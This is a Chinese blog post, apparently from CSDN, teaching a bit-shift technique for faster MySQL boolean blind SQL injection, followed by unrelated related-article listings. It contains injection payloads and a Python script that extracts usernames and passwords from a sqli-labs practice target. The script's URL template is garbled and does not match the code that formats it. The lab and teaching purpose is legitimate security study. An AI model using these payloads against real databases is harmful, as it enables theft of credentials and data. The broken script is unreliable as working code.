mysql 位运算_高效的SQL盲注_位运算(二)

最新推荐文章于 2022-03-31 17:16:11 发布
最新推荐文章于 2022-03-31 17:16:11 发布
阅读量295 收藏
点赞数
文章标签: mysql 位运算
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35910782/article/details/113414356
版权

上篇回顾

高效的SQL盲注_位运算(一)

二次探究

按照位运算高位补0, 低位丢弃的特性, 有了如下猜想:

如果想要每发送一个数据包就可以判断 8位二进制ascii码 的一位, 就必须保证当前的运算结果只有0000 0000和0000 0001两种可能

那么可不可以通过位左移与位右移相互配合, 依次将一个 8位二进制ascii码 的各个位 移动到最后一位, 其它7个位全部用0填充

有了猜想就需要验证, 如下为验证数据:

(黄色为本色, 蓝色为补充位, 删除线标记为丢弃位)

字符 r 的十进制ascii码为 114, 二进制ascii码为 01110010

以 01110010 为测试数据进行运算, 结果如下

d1f2b324b7dc120b9f68dba7c6e4812d.png

由上述测试数据, 我们可以看到

位左移<

3dcc0ebdd4071ca0d75e5851ff0f03a3.png

但现在的结果是杂乱的, 无规律可循

接着进行位右移>>, 且固定平移7位, 此时低位丢7个位, 高位补7个0, 对应的结果就是会把 8位二进制数 的前一位全部顶到最后一位, 又因为前7位均为0, 最后一位只能为0或者1, 所以此时运算结果只有两种可能.

0000 0000 或者 0000 0001

d1bb0d2b50b38c744223f8f9b1057c95.png

但事实并没有这么顺利, 如下为代入数据库后真实的运算结果

select ascii('r')<<0>>7 = 0

select ascii('r')<<1>>7 = 1

select ascii('r')<<2>>7 = 3

select ascii('r')<<3>>7 = 7

select ascii('r')<<4>>7 = 14

select ascii('r')<<5>>7 = 28

select ascii('r')<<6>>7 = 57

select ascii('r')<<7>>7 = 114

4b843dd4543918b021583976b7bc3bf8.png

可以看到, 结果并不是0或者1, 意料之外, 情理之中

查阅的一些文章资料后, 找到了计算结果产生冲突的原因

在MySQL 中, 常量数字默认会以8个字节来表示, 8个字节即为64位

也就是说, 在MySQL数据库中, 每一个 数字并不止8位, 即使很小, 也是默认占64位的空间 (还有56个看不见的0在前面占着位置)

如果是这样的话, 那么上述位运算的位数, 已经不足以将 8位二进制ascii码 的各个位顶到最后一位

但这个问题并不难解决, 我们只需将上述运算的 位左移<< 依次均增加56位, 如下图

7de985f36fb14d4748a2a6267aece691.png

select ascii('r')<<56>>63 = 0

select ascii('r')<<57>>63 = 1

select ascii('r')<<58>>63 = 1

select ascii('r')<<59>>63 = 1

select ascii('r')<<60>>63 = 0

select ascii('r')<<61>>63 = 0

select ascii('r')<<62>>63 = 1

select ascii('r')<<63>>63 = 0

计算结果为10进制, 10进制的0和1与二进制的0和1换算过来是相等的, 直接拼接为 8位的二进制数: 01110010

转换成10进制为 114, 对应字符 r

ascii码中第一位均为0, 所以发送7个数据包即可

payload如下:

# MySQL布尔盲注中, 7个数据包判断当前用户名的第一个字符id=1' and ascii(substr((select user()),1,1))<<57>>63=0-- -id=1' and ascii(substr((select user()),1,1))<<58>>63=0-- -id=1' and ascii(substr((select user()),1,1))<<59>>63=0-- -id=1' and ascii(substr((select user()),1,1))<<60>>63=0-- -id=1' and ascii(substr((select user()),1,1))<<61>>63=0-- -id=1' and ascii(substr((select user()),1,1))<<62>>63=0-- -id=1' and ascii(substr((select user()),1,1))<<63>>63=0-- -# 判断第二个字符id=1' and ascii(substr((select user()),2,1))<<57>>63=0-- -id=1' and ascii(substr((select user()),2,1))<<58>>63=0-- -id=1' and ascii(substr((select user()),2,1))<<59>>63=0-- -...

以sqli-labs靶场第5关为例, 核心代码部分如下:

# -*- coding:utf-8 -*-import requestsdef bitOperation(url):    result = ""  # 存储获取的查询结果    url_bak = url    # 外层循环由查询结果字符的长度控制,内层循环即为固定的7次位运算    for len in range(1, 777):  # 此处长度可控,也可以不做判断直接给一个很长的数字        str = '0'  # 设置当前字符的ascii码二进制的第一位默认为0        for bit in range(57, 64):            url = url.format(len, bit)  # 拼接出payload            r = requests.get(url)            # 以页面正常时的标识关键字作为区分,存在是为0,不存在是为1            if r.text.find("You are in") != -1:                str += '0'            else:                str += '1'            url = url_bak  # 还原url为初识状态        # 二进制转换成十进制,也就是ascii码,再将ascii码转换成字符累加到result变量上        result += chr(int(str, 2))        print(result)        if int(str, 2) == 0:  # 不再作判断长度, 当ascii码为00000000时自动退出(多发7个请求)            print("已超过此次查询字符串的长度,自动停止")            return result        if int(str, 2) == 127:            print("查询内容不存在或语法错误...")            return result    return resultdef main():    url = "http://192.168.238.141/sqli-labs/Less-5/?id=1' and ascii(substr((select group_concat(concat_ws(0x7e,username,password)) from users),{},1))<>63=0-- -"    bitOperation(url)if __name__ == "__main__":    main()

脚本运行结果

c8d3919b0aaee85aeb0842fb5ccaeee1.png

由mysql执行语句监控可以看出每7个请求为一组, 判断一个字符

bc5f961b4eec5c7dcf4f00e01b3589fd.png

总结说明

重要的是请求之间不在相互依赖, 也就是说, 如果某处只能时间盲注, 我们使用 sleep(2) 函数让请求延迟2秒作为判断条件, 那么理论上可以使用多线程同时发多个数据包, 然后对每一个请求返回的状态进行处理, 依次拼接即可. 而二分法则必须等待前一次的判断结果被返回才能进行下一次判断.

yanguang21
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql 位运算效率_mysql位运算简化简单的一对多关系
weixin_36400198的博客
01-18 223
记得以前参与的一个房地互联网平台,用户角色只有固定三种。普通用户、经纪人和管理员。每一种角色的系统权限也是固定的,只有数据权限是动态的。这应该是跟大部分erp系统复杂的角色和权限管理所不一样的地方,也是互联网平台和企业系统的区别之一吧。当时的解决方案是,用一个整型字段存储角色,1代表普通用户,2代表经纪人,4代表管理员。相应的,1+4=5代表普通用户+管理员。换算成位运算就很直观了。1=12=10...
mysql 位运算效率_Mysql位运算简化一对多关系
weixin_29228203的博客
01-18 287
语法& : 按位与,进制位同时都为1的位设为1。| : 按位或,进制位有一个位为1就为1.^ : 按位异或,对应位的进制数不同时,对应位的结果才为1;如果两个对应位数都为0或者都为1,则对应位的结果为0。原理$a = 6 转化为2进制为 110$b = 3 转化为2进制为 11$a & $b即是 110 与 11将$a和$b中都为1的位设为1,位数不够的补0.即110 与 ...
MySQL 位运算
weixin_45659364的博客
04-07 4333
MySQL的支持6种位运算,分别如下 符号 含义 a|b 位或 a&b 位与 a^b 位异或 ~a 位取反 a<<b 位左移 a>>b 位右移 位或 多个操作数的进制位进行逻辑或操作,逻辑或,就是有真为真,全假为假(有1为1,全0为0) 2|3 #2的进制为10,3的进制为11,所以结果为11,也就还是3 位与 多个操作数的进制进行逻辑与操作,逻辑与,就是有假为假,全真为真(有0为0,全1为1) 2&3 #结果
mysql位运算
兮动人
02-11 2356
位运算位运算符是在进制数上进行计算的运算符。位运算符会先将操作数变成进制数,然后进行位运算,最后将计算结果从进制变回十进制数。 MySQL支持的位运算符如下: 1. 按位与运算符 按位与(&)运算符将给定值对应的进制数逐位进行逻辑与运算。当给定值对应的进制位的数值都为1时,则该位返回1,否则返回0。 mysql> SELECT 1 & 10, 20 & 30; +--------+---------+ | 1 & 10 | 20 &amp
mysql 位运算 性能怎么样_【建议收藏】面试官会的位运算奇淫技巧
weixin_30692969的博客
02-05 717
前言位运算隐藏在编程语言的角落中,其神秘而又强大,暗藏内力,有些人光听位运算的大名的心中忐忑,还有些人更是一看到位运算就远远离去,我之前也是。但狡猾的面试官往往喜欢搞偷袭,抓住我们的弱点搞我们,为了防患于未然,特记此篇!本篇的内容为位运算的介绍和一些比较经典的位运算问题进行介绍分析,当然,位运算这么牛,后面肯定还是要归纳总结的。认识位运算什么是位运算?程序中的所有数在计算机内存中都是以进制的形式...
MySQL关于sql_mode解析与设置讲解
12-15
这个sql_mode,简而言之就是:它定义了你MySQL应该支持的sql语法,对数据的校验等等。。 如何查看当前数据库使用的sql_mode: mysql> select @@sql_mode; 如下是我的数据库当前的模式: MySQL服务器能够工作在不同...
MySQL注入常用函数及逻辑运算
01-20
MySQL注入常用函数: 函数名称 函数功能 system_user() 系统用户名 user() 用户名 current_user() 当前用户名 session_user() 连接数据库的用户名 database() 数据库名 version() 数据库版本 @@...
mysql_SQL语句 学习文档
12-26
适合初学者学习的MySQL数据库语句练习文档,内容还是比较全的 1、表操作 2、视图操作(虚表) 3、索引操作 4、数据库模式操作 5、单表操作 6、多表操作 7、表达式与函数的使用 8、相关子查询 9、关系代数运算 10、...
MySQL笔记之运算符使用详解
12-15
Mysql可以通过运算符来对表中数据进行运算,比如通过出生日期求年龄等 运算符包括四类,分别是:算数运算符、比较运算符、逻辑运算符和位运算符 算数运算符加、减、乘运算 代码如下:mysql> select a,a+5,a*2 from t1...
MySQL的Data_ADD函数与日期格式化函数说明
12-15
这些函数执行日期运算。 date 是一个 DATETIME 或DATE值,用来指定起始时间。 expr 是一个表达式,用来指定从起始日期添加或减去的时间间隔值。 Expr是一个字符串;对于负值的时间间隔,它可以以一个 ‘-‘开头。 ...
大幅优化MySQL查询性能的奇技淫巧
12-15
回顾 MySQL / InnoDB 的改善历史。你能很容易发现。在MySQL 5.6稳定版本中从来没有在read-only 这么快的提速,它很容易搞懂,以及在read-only(RO)有着良好的扩张性。也很期待它在read+write(RW)上达到一个较高水平。(特别是在读取数据是数据库主要工作的时候) 然而。我们对于RO在 MySQL 5.6的表现也十分的高兴,在5.7这个版本中,主要工作集中在 read+write (RW)上, 因为在大数据的处理上还没能达到我们的期望。但是RW依赖RO下。能够再次提高速度。 InnoDB 团队通过不断的改进,强烈的推进优化着5.7这个版本的每秒的性能。
mysql 位运算_MySQL数据运算
weixin_33656931的博客
01-23 897
数据查询不只是简单地返回数据库中存储的数据,还要根据业务需求对数据进行运算和筛选,以及确定以什么样的形式显示查询结果。计算字段通常情况下数据库中的原始数据并不是我们所需要的,一般需要我们在查询数据的同时对数据进行运算和转换。语法:select <表达式1>[,<表达式2>...<表达式n>] from <表名>;示例:将每位员工的底薪增加500元my...
Sql性能优化看这一篇就够了
热门推荐
小葫芦的博客
09-25 5万+
前言: 一个优秀开发的必备技能:性能优化,包括:JVM调优、缓存、Sql性能优化等。本文主要讲基于Mysql的索引优化。 首先我们需要了解执行一条查询SQLMysql的处理过程: 其次我们需要知道,我们写的SQLMysql的执行顺序是怎么样的?sql的执行顺序对sql的性能优化很有帮助,很重要。在建立复合索引的时候需要考虑到这点。 例: 在tb_dept中建立一个复合索引 i...
SQL Server 位运算
m0_66982686的博客
03-31 1433
位运算位运算符在两个表达式之间执行位操作,这两个表达式可以为整型数据类型分类中的任何数据类型。 运算符含义 &(按位 AND) 按位 AND(两个操作数)。 |(按位 OR) 按位 OR(两个操作数)。 ^(按位互斥 OR) 按位互斥 OR(两个操作数)。 位运算符的操作数可以是整型或进制字符串数据类型分类中的任何数据类型(但 image 数据类型除外),此外,两个操作数不能同时是进制字符串数据类型分类中的某种数据类型。下表显示所支持的操作数数据类型。 左边操作数 右边操作数 bin
mysql 位运算_知识分享:MySQL运算符
weixin_42498249的博客
01-30 365
MySQL 主要有以下几种运算符:算术运算符比较运算符逻辑运算符位运算MySQL 支持的算术运算符包括:运算符作用+ 加法– 减法* 乘法/ 或 DIV 除法% 或 MOD 取余在除法运...
mysql 使用位运算
无界编程
09-22 3万+
如果你不知道什么是位运算的话, 那么请你先去看看基础的C语言教程吧。 与运算 a & b  , 或运算 a | b ,  异或运算 a ^ b ,或者 你也可以将 与运算理解为 + 法  例如 1|2 = 3   (1+2 = 3)1|2|4 = 7 (1+2+4 = 7)将 异
mssql sqlserver SQL 位运算举例权限应用
weixin_30487317的博客
08-15 62
摘要: 下文通过举例的方式讲述sqlserver中位运算的相关知识,如下所示: 实验环境:sqlserver 2008 R2 在sqlserver的权限设置,我们通常使用1、2、4、8、16、32、64、128等数值分别表示相关信息的某一状态供业务状态使用,通过字段值之间的组合形成一个状态值存储到数据库中, 设置一个角色拥有的权限例: 1:代表“查看”按钮权限...
SQL 位运算
weixin_34128501的博客
05-03 424
SQL Server ,采用1,2,4,8,16.....等用数字标识的状态字段可以进行累加,对存在的几种状态进行组合,从而可形成各种组合状态例如:一条记录该字段原来的数字是,2,如我们想加上4,则可以用update t_User set iFlag = iFlag | 4 where UserID = 1(iFlag 为该字段名)例2:在加上4之后我们想去掉4怎么办呢,可以这样实现update...
位运算的简介与实例(Mysql
西召
07-14 4720
程序中的所有数在计算机内存中都是以进制的形式储存的。位运算就是直接对整数在内存中的进制位进行操作。 In digital computer programming, a bitwise operation operates on one or more bit patterns or binary numerals at the level of their individual bits.
sql 字符串 位运算
最新发布
06-06
SQL 中,使用位运算操作字符串并不是很常见。因为字符串本身是不支持位运算的,只有数值类型才能进行位运算。但是,我们可以通过将字符串转化为进制数值来进行位运算。 例如,我们可以使用 MySQL 中的 `CONV` 函数将字符串转化为进制形式的数值,然后进行位运算。下面是一个使用 `CONV` 函数进行位运算的示例: ``` SELECT CONV('hello', 16, 2) & CONV('world', 16, 2) AS result; ``` 以上 SQL 语句将字符串 'hello' 和 'world' 分别转换为进制数值,然后进行位运算,最终输出结果。需要注意的是,因为进制数值的长度可能不一样,所以在进行位运算之前需要将它们转换为相同长度的数值,否则可能会得到意想不到的结果。 总之,在 SQL 中进行字符串的位运算并不是很常见,而且需要考虑到数据类型转换的问题,使用时需要谨慎。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值